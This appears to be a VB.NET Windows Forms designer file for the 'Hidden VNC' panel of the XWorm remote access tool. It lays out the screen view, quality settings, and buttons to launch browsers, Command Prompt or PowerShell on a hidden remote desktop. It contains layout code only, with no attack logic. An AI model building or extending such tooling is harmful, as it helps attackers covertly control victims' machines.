Partial Class HVNC Inherits System.Windows.Forms.Form 'Form overrides dispose to clean up the component list. Protected Overrides Sub Dispose(ByVal disposing As Boolean) Try If disposing AndAlso components IsNot Nothing Then components.Dispose() End If Finally MyBase.Dispose(disposing) End Try End Sub 'Required by the Windows Form Designer Private components As System.ComponentModel.IContainer 'NOTE: The following procedure is required by the Windows Form Designer 'It can be modified using the Windows Form Designer. 'Do not modify it using the code editor. Private Sub InitializeComponent() components = New System.ComponentModel.Container() Dim resources As System.ComponentModel.ComponentResourceManager = New System.ComponentModel.ComponentResourceManager(GetType(HVNC)) PictureBox1 = New System.Windows.Forms.PictureBox() Label3 = New System.Windows.Forms.Label() Label1 = New System.Windows.Forms.Label() Label2 = New System.Windows.Forms.Label() StatusStrip1 = New System.Windows.Forms.StatusStrip() ToolStripStatusLabel1 = New System.Windows.Forms.ToolStripStatusLabel() Timer1 = New System.Windows.Forms.Timer(components) Timer2 = New System.Windows.Forms.Timer(components) Timer3 = New System.Windows.Forms.Timer(components) Panel2 = New System.Windows.Forms.Panel() Guna2Panel1 = New Guna.UI2.WinForms.Guna2Panel() Guna2GradientButton1 = New Guna.UI2.WinForms.Guna2GradientButton() Guna2ComboBox1 = New Guna.UI2.WinForms.Guna2ComboBox() Guna2Panel3 = New Guna.UI2.WinForms.Guna2Panel() Guna2Panel2 = New Guna.UI2.WinForms.Guna2Panel() Guna2ComboBox3 = New Guna.UI2.WinForms.Guna2ComboBox() Guna2ComboBox2 = New Guna.UI2.WinForms.Guna2ComboBox() Guna2GradientButton6 = New Guna.UI2.WinForms.Guna2GradientButton() Guna2GradientButton2 = New Guna.UI2.WinForms.Guna2GradientButton() Guna2GroupBox1 = New Guna.UI2.WinForms.Guna2GroupBox() Guna2GradientButton3 = New Guna.UI2.WinForms.Guna2GradientButton() Guna2GradientButton4 = New Guna.UI2.WinForms.Guna2GradientButton() Guna2ComboBox4 = New Guna.UI2.WinForms.Guna2ComboBox() Label4 = New System.Windows.Forms.Label() Guna2GradientButton5 = New Guna.UI2.WinForms.Guna2GradientButton() Guna2Panel4 = New Guna.UI2.WinForms.Guna2Panel() CType(PictureBox1, System.ComponentModel.ISupportInitialize).BeginInit() StatusStrip1.SuspendLayout() Panel2.SuspendLayout() Guna2Panel1.SuspendLayout() Guna2GroupBox1.SuspendLayout() Guna2Panel4.SuspendLayout() SuspendLayout() ' 'PictureBox1 ' PictureBox1.Dock = System.Windows.Forms.DockStyle.Fill PictureBox1.Location = New System.Drawing.Point(0, 65) PictureBox1.Name = "PictureBox1" PictureBox1.Size = New System.Drawing.Size(815, 332) PictureBox1.SizeMode = System.Windows.Forms.PictureBoxSizeMode.StretchImage PictureBox1.TabIndex = 1 PictureBox1.TabStop = False ' 'Label3 ' Label3.AutoSize = True Label3.ForeColor = System.Drawing.Color.Black Label3.Location = New System.Drawing.Point(246, 38) Label3.Name = "Label3" Label3.Size = New System.Drawing.Size(45, 13) Label3.TabIndex = 14 Label3.Text = "Resize :" ' 'Label1 ' Label1.AutoSize = True Label1.ForeColor = System.Drawing.Color.Black Label1.Location = New System.Drawing.Point(19, 38) Label1.Name = "Label1" Label1.Size = New System.Drawing.Size(59, 15) Label1.TabIndex = 11 Label1.Text = "Software :" ' 'Label2 ' Label2.AutoSize = True Label2.ForeColor = System.Drawing.Color.Black Label2.Location = New System.Drawing.Point(74, 38) Label2.Name = "Label2" Label2.Size = New System.Drawing.Size(48, 13) Label2.TabIndex = 12 Label2.Text = "Quality :" ' 'StatusStrip1 ' StatusStrip1.BackColor = System.Drawing.Color.White StatusStrip1.Items.AddRange(New System.Windows.Forms.ToolStripItem() {ToolStripStatusLabel1}) StatusStrip1.Location = New System.Drawing.Point(0, 467) StatusStrip1.Name = "StatusStrip1" StatusStrip1.Size = New System.Drawing.Size(815, 22) StatusStrip1.TabIndex = 4 StatusStrip1.Text = "StatusStrip1" ' 'ToolStripStatusLabel1 ' ToolStripStatusLabel1.ForeColor = System.Drawing.Color.Black ToolStripStatusLabel1.Name = "ToolStripStatusLabel1" ToolStripStatusLabel1.Size = New System.Drawing.Size(13, 17) ToolStripStatusLabel1.Text = ".." ' 'Timer1 ' Timer1.Enabled = True Timer1.Interval = 1000 ' 'Timer2 ' ' 'Timer3 ' ' 'Panel2 ' Panel2.Controls.Add(Guna2Panel4) Panel2.Controls.Add(Guna2ComboBox3) Panel2.Controls.Add(Label3) Panel2.Controls.Add(Guna2Panel1) Panel2.Controls.Add(Guna2ComboBox1) Panel2.Controls.Add(Guna2Panel3) Panel2.Controls.Add(Guna2Panel2) Panel2.Controls.Add(Label2) Panel2.Dock = System.Windows.Forms.DockStyle.Top Panel2.Location = New System.Drawing.Point(0, 0) Panel2.Name = "Panel2" Panel2.Size = New System.Drawing.Size(815, 65) Panel2.TabIndex = 30 ' 'Guna2Panel1 ' Guna2Panel1.Controls.Add(Guna2GradientButton1) Guna2Panel1.Dock = System.Windows.Forms.DockStyle.Top Guna2Panel1.Location = New System.Drawing.Point(68, 0) Guna2Panel1.Name = "Guna2Panel1" Guna2Panel1.Size = New System.Drawing.Size(679, 21) Guna2Panel1.TabIndex = 35 ' 'Guna2GradientButton1 ' Guna2GradientButton1.DisabledState.BorderColor = System.Drawing.Color.DarkGray Guna2GradientButton1.DisabledState.CustomBorderColor = System.Drawing.Color.DarkGray Guna2GradientButton1.DisabledState.FillColor = System.Drawing.Color.FromArgb(CType(CType(169, Byte), Integer), CType(CType(169, Byte), Integer), CType(CType(169, Byte), Integer)) Guna2GradientButton1.DisabledState.FillColor2 = System.Drawing.Color.FromArgb(CType(CType(169, Byte), Integer), CType(CType(169, Byte), Integer), CType(CType(169, Byte), Integer)) Guna2GradientButton1.DisabledState.ForeColor = System.Drawing.Color.FromArgb(CType(CType(141, Byte), Integer), CType(CType(141, Byte), Integer), CType(CType(141, Byte), Integer)) Guna2GradientButton1.Dock = System.Windows.Forms.DockStyle.Fill Guna2GradientButton1.FillColor2 = System.Drawing.Color.FromArgb(CType(CType(40, Byte), Integer), CType(CType(192, Byte), Integer), CType(CType(182, Byte), Integer)) Guna2GradientButton1.Font = New System.Drawing.Font("Segoe UI", 9.0!) Guna2GradientButton1.ForeColor = System.Drawing.Color.White Guna2GradientButton1.Image = Global.XWorm.My.Resources.Resources._Stop Guna2GradientButton1.ImageAlign = System.Windows.Forms.HorizontalAlignment.Left Guna2GradientButton1.ImageSize = New System.Drawing.Size(15, 15) Guna2GradientButton1.Location = New System.Drawing.Point(0, 0) Guna2GradientButton1.Name = "Guna2GradientButton1" Guna2GradientButton1.Size = New System.Drawing.Size(679, 21) Guna2GradientButton1.TabIndex = 34 Guna2GradientButton1.Text = "OFF" ' 'Guna2ComboBox1 ' Guna2ComboBox1.BackColor = System.Drawing.Color.Transparent Guna2ComboBox1.BorderColor = System.Drawing.Color.FromArgb(CType(CType(40, Byte), Integer), CType(CType(192, Byte), Integer), CType(CType(182, Byte), Integer)) Guna2ComboBox1.BorderRadius = 3 Guna2ComboBox1.DrawMode = System.Windows.Forms.DrawMode.OwnerDrawFixed Guna2ComboBox1.DropDownStyle = System.Windows.Forms.ComboBoxStyle.DropDownList Guna2ComboBox1.FocusedColor = System.Drawing.Color.FromArgb(CType(CType(40, Byte), Integer), CType(CType(192, Byte), Integer), CType(CType(182, Byte), Integer)) Guna2ComboBox1.FocusedState.BorderColor = System.Drawing.Color.FromArgb(CType(CType(40, Byte), Integer), CType(CType(192, Byte), Integer), CType(CType(182, Byte), Integer)) Guna2ComboBox1.Font = New System.Drawing.Font("Segoe UI", 8.25!, System.Drawing.FontStyle.Regular, System.Drawing.GraphicsUnit.Point, CType(0, Byte)) Guna2ComboBox1.ForeColor = System.Drawing.Color.Black Guna2ComboBox1.ItemHeight = 15 Guna2ComboBox1.Items.AddRange(New Object() {"10%", "20%", "30%", "40%", "50%", "60%", "70%", "80%", "90%", "100%"}) Guna2ComboBox1.Location = New System.Drawing.Point(128, 34) Guna2ComboBox1.Name = "Guna2ComboBox1" Guna2ComboBox1.Size = New System.Drawing.Size(107, 21) Guna2ComboBox1.TabIndex = 28 ' 'Guna2Panel3 ' Guna2Panel3.Dock = System.Windows.Forms.DockStyle.Left Guna2Panel3.Location = New System.Drawing.Point(0, 0) Guna2Panel3.Name = "Guna2Panel3" Guna2Panel3.Size = New System.Drawing.Size(68, 65) Guna2Panel3.TabIndex = 37 ' 'Guna2Panel2 ' Guna2Panel2.Dock = System.Windows.Forms.DockStyle.Right Guna2Panel2.Location = New System.Drawing.Point(747, 0) Guna2Panel2.Name = "Guna2Panel2" Guna2Panel2.Size = New System.Drawing.Size(68, 65) Guna2Panel2.TabIndex = 36 ' 'Guna2ComboBox3 ' Guna2ComboBox3.BackColor = System.Drawing.Color.Transparent Guna2ComboBox3.BorderColor = System.Drawing.Color.FromArgb(CType(CType(40, Byte), Integer), CType(CType(192, Byte), Integer), CType(CType(182, Byte), Integer)) Guna2ComboBox3.BorderRadius = 3 Guna2ComboBox3.DrawMode = System.Windows.Forms.DrawMode.OwnerDrawFixed Guna2ComboBox3.DropDownStyle = System.Windows.Forms.ComboBoxStyle.DropDownList Guna2ComboBox3.FocusedColor = System.Drawing.Color.FromArgb(CType(CType(40, Byte), Integer), CType(CType(192, Byte), Integer), CType(CType(182, Byte), Integer)) Guna2ComboBox3.FocusedState.BorderColor = System.Drawing.Color.FromArgb(CType(CType(40, Byte), Integer), CType(CType(192, Byte), Integer), CType(CType(182, Byte), Integer)) Guna2ComboBox3.Font = New System.Drawing.Font("Segoe UI", 8.25!, System.Drawing.FontStyle.Regular, System.Drawing.GraphicsUnit.Point, CType(0, Byte)) Guna2ComboBox3.ForeColor = System.Drawing.Color.Black Guna2ComboBox3.ItemHeight = 15 Guna2ComboBox3.Items.AddRange(New Object() {"10%", "20%", "30%", "40%", "50%", "60%", "70%", "80%", "90%", "100%"}) Guna2ComboBox3.Location = New System.Drawing.Point(297, 34) Guna2ComboBox3.Name = "Guna2ComboBox3" Guna2ComboBox3.Size = New System.Drawing.Size(107, 21) Guna2ComboBox3.TabIndex = 38 ' 'Guna2ComboBox2 ' Guna2ComboBox2.BackColor = System.Drawing.Color.Transparent Guna2ComboBox2.BorderColor = System.Drawing.Color.FromArgb(CType(CType(40, Byte), Integer), CType(CType(192, Byte), Integer), CType(CType(182, Byte), Integer)) Guna2ComboBox2.BorderRadius = 3 Guna2ComboBox2.DrawMode = System.Windows.Forms.DrawMode.OwnerDrawFixed Guna2ComboBox2.DropDownStyle = System.Windows.Forms.ComboBoxStyle.DropDownList Guna2ComboBox2.FocusedColor = System.Drawing.Color.FromArgb(CType(CType(40, Byte), Integer), CType(CType(192, Byte), Integer), CType(CType(182, Byte), Integer)) Guna2ComboBox2.FocusedState.BorderColor = System.Drawing.Color.FromArgb(CType(CType(40, Byte), Integer), CType(CType(192, Byte), Integer), CType(CType(182, Byte), Integer)) Guna2ComboBox2.Font = New System.Drawing.Font("Segoe UI", 8.25!) Guna2ComboBox2.ForeColor = System.Drawing.Color.Black Guna2ComboBox2.ItemHeight = 15 Guna2ComboBox2.Items.AddRange(New Object() {"EdgeBrowser", "BraveBrowser", "FireFoxBrowser", "ChromeBrowser", "CommandPrompt", "PowerShell"}) Guna2ComboBox2.Location = New System.Drawing.Point(84, 36) Guna2ComboBox2.Name = "Guna2ComboBox2" Guna2ComboBox2.Size = New System.Drawing.Size(156, 21) Guna2ComboBox2.TabIndex = 39 ' 'Guna2GradientButton6 ' Guna2GradientButton6.BorderRadius = 3 Guna2GradientButton6.DisabledState.BorderColor = System.Drawing.Color.DarkGray Guna2GradientButton6.DisabledState.CustomBorderColor = System.Drawing.Color.DarkGray Guna2GradientButton6.DisabledState.FillColor = System.Drawing.Color.FromArgb(CType(CType(169, Byte), Integer), CType(CType(169, Byte), Integer), CType(CType(169, Byte), Integer)) Guna2GradientButton6.DisabledState.FillColor2 = System.Drawing.Color.FromArgb(CType(CType(169, Byte), Integer), CType(CType(169, Byte), Integer), CType(CType(169, Byte), Integer)) Guna2GradientButton6.DisabledState.ForeColor = System.Drawing.Color.FromArgb(CType(CType(141, Byte), Integer), CType(CType(141, Byte), Integer), CType(CType(141, Byte), Integer)) Guna2GradientButton6.FillColor2 = System.Drawing.Color.FromArgb(CType(CType(40, Byte), Integer), CType(CType(192, Byte), Integer), CType(CType(182, Byte), Integer)) Guna2GradientButton6.Font = New System.Drawing.Font("Segoe UI", 9.0!) Guna2GradientButton6.ForeColor = System.Drawing.Color.White Guna2GradientButton6.ImageAlign = System.Windows.Forms.HorizontalAlignment.Left Guna2GradientButton6.ImageSize = New System.Drawing.Size(17, 17) Guna2GradientButton6.Location = New System.Drawing.Point(246, 36) Guna2GradientButton6.Name = "Guna2GradientButton6" Guna2GradientButton6.Size = New System.Drawing.Size(76, 21) Guna2GradientButton6.TabIndex = 74 Guna2GradientButton6.Text = "Run" ' 'Guna2GradientButton2 ' Guna2GradientButton2.BorderRadius = 3 Guna2GradientButton2.DisabledState.BorderColor = System.Drawing.Color.DarkGray Guna2GradientButton2.DisabledState.CustomBorderColor = System.Drawing.Color.DarkGray Guna2GradientButton2.DisabledState.FillColor = System.Drawing.Color.FromArgb(CType(CType(169, Byte), Integer), CType(CType(169, Byte), Integer), CType(CType(169, Byte), Integer)) Guna2GradientButton2.DisabledState.FillColor2 = System.Drawing.Color.FromArgb(CType(CType(169, Byte), Integer), CType(CType(169, Byte), Integer), CType(CType(169, Byte), Integer)) Guna2GradientButton2.DisabledState.ForeColor = System.Drawing.Color.FromArgb(CType(CType(141, Byte), Integer), CType(CType(141, Byte), Integer), CType(CType(141, Byte), Integer)) Guna2GradientButton2.FillColor2 = System.Drawing.Color.FromArgb(CType(CType(40, Byte), Integer), CType(CType(192, Byte), Integer), CType(CType(182, Byte), Integer)) Guna2GradientButton2.Font = New System.Drawing.Font("Segoe UI", 9.0!) Guna2GradientButton2.ForeColor = System.Drawing.Color.White Guna2GradientButton2.ImageAlign = System.Windows.Forms.HorizontalAlignment.Left Guna2GradientButton2.ImageSize = New System.Drawing.Size(17, 17) Guna2GradientButton2.Location = New System.Drawing.Point(328, 36) Guna2GradientButton2.Name = "Guna2GradientButton2" Guna2GradientButton2.Size = New System.Drawing.Size(76, 21) Guna2GradientButton2.TabIndex = 75 Guna2GradientButton2.Text = "Custom" ' 'Guna2GroupBox1 ' Guna2GroupBox1.Controls.Add(Guna2GradientButton4) Guna2GroupBox1.Controls.Add(Guna2GradientButton3) Guna2GroupBox1.Controls.Add(Guna2GradientButton2) Guna2GroupBox1.Controls.Add(Guna2ComboBox2) Guna2GroupBox1.Controls.Add(Guna2GradientButton6) Guna2GroupBox1.Controls.Add(Label1) Guna2GroupBox1.CustomBorderThickness = New System.Windows.Forms.Padding(0) Guna2GroupBox1.Dock = System.Windows.Forms.DockStyle.Bottom Guna2GroupBox1.Font = New System.Drawing.Font("Segoe UI", 9.0!) Guna2GroupBox1.ForeColor = System.Drawing.Color.Black Guna2GroupBox1.Location = New System.Drawing.Point(0, 397) Guna2GroupBox1.Name = "Guna2GroupBox1" Guna2GroupBox1.Size = New System.Drawing.Size(815, 70) Guna2GroupBox1.TabIndex = 31 Guna2GroupBox1.Text = "Options" ' 'Guna2GradientButton3 ' Guna2GradientButton3.BorderRadius = 3 Guna2GradientButton3.DisabledState.BorderColor = System.Drawing.Color.DarkGray Guna2GradientButton3.DisabledState.CustomBorderColor = System.Drawing.Color.DarkGray Guna2GradientButton3.DisabledState.FillColor = System.Drawing.Color.FromArgb(CType(CType(169, Byte), Integer), CType(CType(169, Byte), Integer), CType(CType(169, Byte), Integer)) Guna2GradientButton3.DisabledState.FillColor2 = System.Drawing.Color.FromArgb(CType(CType(169, Byte), Integer), CType(CType(169, Byte), Integer), CType(CType(169, Byte), Integer)) Guna2GradientButton3.DisabledState.ForeColor = System.Drawing.Color.FromArgb(CType(CType(141, Byte), Integer), CType(CType(141, Byte), Integer), CType(CType(141, Byte), Integer)) Guna2GradientButton3.FillColor2 = System.Drawing.Color.FromArgb(CType(CType(40, Byte), Integer), CType(CType(192, Byte), Integer), CType(CType(182, Byte), Integer)) Guna2GradientButton3.Font = New System.Drawing.Font("Segoe UI", 9.0!) Guna2GradientButton3.ForeColor = System.Drawing.Color.White Guna2GradientButton3.ImageAlign = System.Windows.Forms.HorizontalAlignment.Left Guna2GradientButton3.ImageSize = New System.Drawing.Size(17, 17) Guna2GradientButton3.Location = New System.Drawing.Point(410, 36) Guna2GradientButton3.Name = "Guna2GradientButton3" Guna2GradientButton3.Size = New System.Drawing.Size(76, 21) Guna2GradientButton3.TabIndex = 76 Guna2GradientButton3.Text = "Copy" ' 'Guna2GradientButton4 ' Guna2GradientButton4.BorderRadius = 3 Guna2GradientButton4.DisabledState.BorderColor = System.Drawing.Color.DarkGray Guna2GradientButton4.DisabledState.CustomBorderColor = System.Drawing.Color.DarkGray Guna2GradientButton4.DisabledState.FillColor = System.Drawing.Color.FromArgb(CType(CType(169, Byte), Integer), CType(CType(169, Byte), Integer), CType(CType(169, Byte), Integer)) Guna2GradientButton4.DisabledState.FillColor2 = System.Drawing.Color.FromArgb(CType(CType(169, Byte), Integer), CType(CType(169, Byte), Integer), CType(CType(169, Byte), Integer)) Guna2GradientButton4.DisabledState.ForeColor = System.Drawing.Color.FromArgb(CType(CType(141, Byte), Integer), CType(CType(141, Byte), Integer), CType(CType(141, Byte), Integer)) Guna2GradientButton4.FillColor2 = System.Drawing.Color.FromArgb(CType(CType(40, Byte), Integer), CType(CType(192, Byte), Integer), CType(CType(182, Byte), Integer)) Guna2GradientButton4.Font = New System.Drawing.Font("Segoe UI", 9.0!) Guna2GradientButton4.ForeColor = System.Drawing.Color.White Guna2GradientButton4.ImageAlign = System.Windows.Forms.HorizontalAlignment.Left Guna2GradientButton4.ImageSize = New System.Drawing.Size(17, 17) Guna2GradientButton4.Location = New System.Drawing.Point(492, 36) Guna2GradientButton4.Name = "Guna2GradientButton4" Guna2GradientButton4.Size = New System.Drawing.Size(76, 21) Guna2GradientButton4.TabIndex = 77 Guna2GradientButton4.Text = "Paste" ' 'Guna2ComboBox4 ' Guna2ComboBox4.BackColor = System.Drawing.Color.Transparent Guna2ComboBox4.BorderColor = System.Drawing.Color.FromArgb(CType(CType(40, Byte), Integer), CType(CType(192, Byte), Integer), CType(CType(182, Byte), Integer)) Guna2ComboBox4.BorderRadius = 3 Guna2ComboBox4.DrawMode = System.Windows.Forms.DrawMode.OwnerDrawFixed Guna2ComboBox4.DropDownStyle = System.Windows.Forms.ComboBoxStyle.DropDownList Guna2ComboBox4.FocusedColor = System.Drawing.Color.FromArgb(CType(CType(40, Byte), Integer), CType(CType(192, Byte), Integer), CType(CType(182, Byte), Integer)) Guna2ComboBox4.FocusedState.BorderColor = System.Drawing.Color.FromArgb(CType(CType(40, Byte), Integer), CType(CType(192, Byte), Integer), CType(CType(182, Byte), Integer)) Guna2ComboBox4.Font = New System.Drawing.Font("Segoe UI", 8.25!) Guna2ComboBox4.ForeColor = System.Drawing.Color.Black Guna2ComboBox4.ItemHeight = 15 Guna2ComboBox4.Items.AddRange(New Object() {"Close", "Minimize", "Maximize"}) Guna2ComboBox4.Location = New System.Drawing.Point(63, 13) Guna2ComboBox4.Name = "Guna2ComboBox4" Guna2ComboBox4.Size = New System.Drawing.Size(105, 21) Guna2ComboBox4.TabIndex = 41 ' 'Label4 ' Label4.AutoSize = True Label4.ForeColor = System.Drawing.Color.Black Label4.Location = New System.Drawing.Point(5, 17) Label4.Name = "Label4" Label4.Size = New System.Drawing.Size(52, 13) Label4.TabIndex = 42 Label4.Text = "Window :" ' 'Guna2GradientButton5 ' Guna2GradientButton5.BorderRadius = 3 Guna2GradientButton5.DisabledState.BorderColor = System.Drawing.Color.DarkGray Guna2GradientButton5.DisabledState.CustomBorderColor = System.Drawing.Color.DarkGray Guna2GradientButton5.DisabledState.FillColor = System.Drawing.Color.FromArgb(CType(CType(169, Byte), Integer), CType(CType(169, Byte), Integer), CType(CType(169, Byte), Integer)) Guna2GradientButton5.DisabledState.FillColor2 = System.Drawing.Color.FromArgb(CType(CType(169, Byte), Integer), CType(CType(169, Byte), Integer), CType(CType(169, Byte), Integer)) Guna2GradientButton5.DisabledState.ForeColor = System.Drawing.Color.FromArgb(CType(CType(141, Byte), Integer), CType(CType(141, Byte), Integer), CType(CType(141, Byte), Integer)) Guna2GradientButton5.FillColor2 = System.Drawing.Color.FromArgb(CType(CType(40, Byte), Integer), CType(CType(192, Byte), Integer), CType(CType(182, Byte), Integer)) Guna2GradientButton5.Font = New System.Drawing.Font("Segoe UI", 9.0!) Guna2GradientButton5.ForeColor = System.Drawing.Color.White Guna2GradientButton5.ImageAlign = System.Windows.Forms.HorizontalAlignment.Left Guna2GradientButton5.ImageSize = New System.Drawing.Size(17, 17) Guna2GradientButton5.Location = New System.Drawing.Point(174, 13) Guna2GradientButton5.Name = "Guna2GradientButton5" Guna2GradientButton5.Size = New System.Drawing.Size(47, 21) Guna2GradientButton5.TabIndex = 79 Guna2GradientButton5.Text = "Ok" ' 'Guna2Panel4 ' Guna2Panel4.Controls.Add(Label4) Guna2Panel4.Controls.Add(Guna2GradientButton5) Guna2Panel4.Controls.Add(Guna2ComboBox4) Guna2Panel4.Dock = System.Windows.Forms.DockStyle.Right Guna2Panel4.Location = New System.Drawing.Point(521, 21) Guna2Panel4.Name = "Guna2Panel4" Guna2Panel4.Size = New System.Drawing.Size(226, 44) Guna2Panel4.TabIndex = 80 ' 'Form2 ' AutoScaleDimensions = New System.Drawing.SizeF(6.0!, 13.0!) AutoScaleMode = System.Windows.Forms.AutoScaleMode.Font BackColor = System.Drawing.Color.White ClientSize = New System.Drawing.Size(815, 489) Controls.Add(PictureBox1) Controls.Add(Panel2) Controls.Add(Guna2GroupBox1) Controls.Add(StatusStrip1) Icon = CType(resources.GetObject("$this.Icon"), System.Drawing.Icon) MinimumSize = New System.Drawing.Size(831, 528) Name = "Form2" Text = "Hidden VNC" CType(PictureBox1, System.ComponentModel.ISupportInitialize).EndInit() StatusStrip1.ResumeLayout(False) StatusStrip1.PerformLayout() Panel2.ResumeLayout(False) Panel2.PerformLayout() Guna2Panel1.ResumeLayout(False) Guna2GroupBox1.ResumeLayout(False) Guna2GroupBox1.PerformLayout() Guna2Panel4.ResumeLayout(False) Guna2Panel4.PerformLayout() ResumeLayout(False) PerformLayout() End Sub Friend WithEvents PictureBox1 As PictureBox Friend WithEvents StatusStrip1 As StatusStrip Friend WithEvents ToolStripStatusLabel1 As ToolStripStatusLabel Friend WithEvents Label1 As Label Friend WithEvents Label3 As Label Friend WithEvents Label2 As Label Friend WithEvents Timer1 As Timer Friend WithEvents Timer2 As Timer Friend WithEvents Timer3 As Timer Friend WithEvents Panel2 As Panel Friend WithEvents Guna2ComboBox3 As Guna.UI2.WinForms.Guna2ComboBox Friend WithEvents Guna2Panel1 As Guna.UI2.WinForms.Guna2Panel Friend WithEvents Guna2GradientButton1 As Guna.UI2.WinForms.Guna2GradientButton Friend WithEvents Guna2ComboBox1 As Guna.UI2.WinForms.Guna2ComboBox Friend WithEvents Guna2Panel3 As Guna.UI2.WinForms.Guna2Panel Friend WithEvents Guna2Panel2 As Guna.UI2.WinForms.Guna2Panel Friend WithEvents Guna2ComboBox2 As Guna.UI2.WinForms.Guna2ComboBox Friend WithEvents Guna2GradientButton6 As Guna.UI2.WinForms.Guna2GradientButton Friend WithEvents Guna2GradientButton2 As Guna.UI2.WinForms.Guna2GradientButton Friend WithEvents Guna2GroupBox1 As Guna.UI2.WinForms.Guna2GroupBox Friend WithEvents Guna2GradientButton4 As Guna.UI2.WinForms.Guna2GradientButton Friend WithEvents Guna2GradientButton3 As Guna.UI2.WinForms.Guna2GradientButton Friend WithEvents Guna2GradientButton5 As Guna.UI2.WinForms.Guna2GradientButton Friend WithEvents Label4 As Label Friend WithEvents Guna2ComboBox4 As Guna.UI2.WinForms.Guna2ComboBox Friend WithEvents Guna2Panel4 As Guna.UI2.WinForms.Guna2Panel End Class